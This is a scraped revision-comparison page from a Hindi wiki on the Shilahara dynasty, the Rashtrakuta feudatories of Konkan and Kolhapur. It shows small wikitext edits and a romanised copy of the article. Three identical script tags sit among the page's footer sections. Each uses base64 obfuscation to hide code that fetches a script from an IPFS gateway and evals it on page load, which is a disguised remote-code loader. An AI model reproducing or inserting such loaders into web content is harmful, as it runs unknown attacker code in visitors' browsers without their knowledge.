Difference between revisions of "शिलाहार वंश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सदी " to " सदी ")
 
(4 intermediate revisions by 2 users not shown)
Line 3: Line 3:
 
*इनमें उत्तरी कोंकण का शिलाहार राज्य मुख्य था।  
 
*इनमें उत्तरी कोंकण का शिलाहार राज्य मुख्य था।  
 
*कोंकण के ये शिलाहार राजा राष्ट्रकूटों के सामन्त थे।  
 
*कोंकण के ये शिलाहार राजा राष्ट्रकूटों के सामन्त थे।  
*जब दसवीं सदी के अन्तिम भाग में [[चालुक्य साम्राज्य|चालुक्यों]] के उत्कर्ष के कारण राष्ट्रकूटों की शक्ति क्षीण हुई, तो शिलाहारों ने भी अपनी स्वतंत्रता की घोषणा कर दी। पर उनकी स्वतंत्रता देर तक क़ायम नहीं रह सकी।  
+
*जब दसवीं [[सदी]] के अन्तिम भाग में [[चालुक्य साम्राज्य|चालुक्यों]] के उत्कर्ष के कारण राष्ट्रकूटों की शक्ति क्षीण हुई, तो शिलाहारों ने भी अपनी स्वतंत्रता की घोषणा कर दी। पर उनकी स्वतंत्रता देर तक क़ायम नहीं रह सकी।  
*अन्हिलवाड़ा के चालुक्यों ने उन्हें अपनी अधीनता मानने के लिए विवश किया, और बाद में [[देवगिरि का यादव वंश||देवगिरि के यादव]] राजा सिंघण ने उन्हें विजय किया।  
+
*अन्हिलवाड़ा के चालुक्यों ने उन्हें अपनी अधीनता मानने के लिए विवश किया, और बाद में [[देवगिरि का यादव वंश|देवगिरि के यादव]] राजा सिंघण ने उन्हें विजय किया।  
 
*सिंघण ने न केवल उत्तरी कोंकण को जीता, अपितु कोल्हापुर के शिलाहार वंश को भी उसने अपने अधीन किया।  
 
*सिंघण ने न केवल उत्तरी कोंकण को जीता, अपितु कोल्हापुर के शिलाहार वंश को भी उसने अपने अधीन किया।  
 
*वस्तुतः शिलाहारों ने बहुत कम समय तक स्वतंत्रापूर्वक शासन किया।  
 
*वस्तुतः शिलाहारों ने बहुत कम समय तक स्वतंत्रापूर्वक शासन किया।  
*विविध समयों में वे राष्ट्रकूट, चालुक्य और यादव वंशों के राजाओं की महत्वाकांक्षाओं के शिकार बनते रहे।
+
*विविध समयों में वे राष्ट्रकूट, चालुक्य और यादव वंशों के राजाओं की महत्त्वाकांक्षाओं के शिकार बनते रहे।
  
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 17: Line 18:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:58, 3 October 2011

  • shilahar rajavansh ke rajaoan ki sthiti bhi pahale samantoan ke saman thi.
  • jis samay dakshinapath mean rashtrakootoan ki prabhuta thi, tab (athavian-navian sadiyoan mean) shilaharoan ke tin rajy uttari koankan, dakshini koankan aur kolhapur mean vidyaman the.
  • inamean uttari koankan ka shilahar rajy mukhy tha.
  • koankan ke ye shilahar raja rashtrakootoan ke samant the.
  • jab dasavian sadi ke antim bhag mean chalukyoan ke utkarsh ke karan rashtrakootoan ki shakti kshin huee, to shilaharoan ne bhi apani svatantrata ki ghoshana kar di. par unaki svatantrata der tak qayam nahian rah saki.
  • anhilava da ke chalukyoan ne unhean apani adhinata manane ke lie vivash kiya, aur bad mean devagiri ke yadav raja sianghan ne unhean vijay kiya.
  • sianghan ne n keval uttari koankan ko jita, apitu kolhapur ke shilahar vansh ko bhi usane apane adhin kiya.
  • vastutah shilaharoan ne bahut kam samay tak svatantrapoorvak shasan kiya.
  • vividh samayoan mean ve rashtrakoot, chaluky aur yadav vanshoan ke rajaoan ki mahattvakaankshaoan ke shikar banate rahe.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>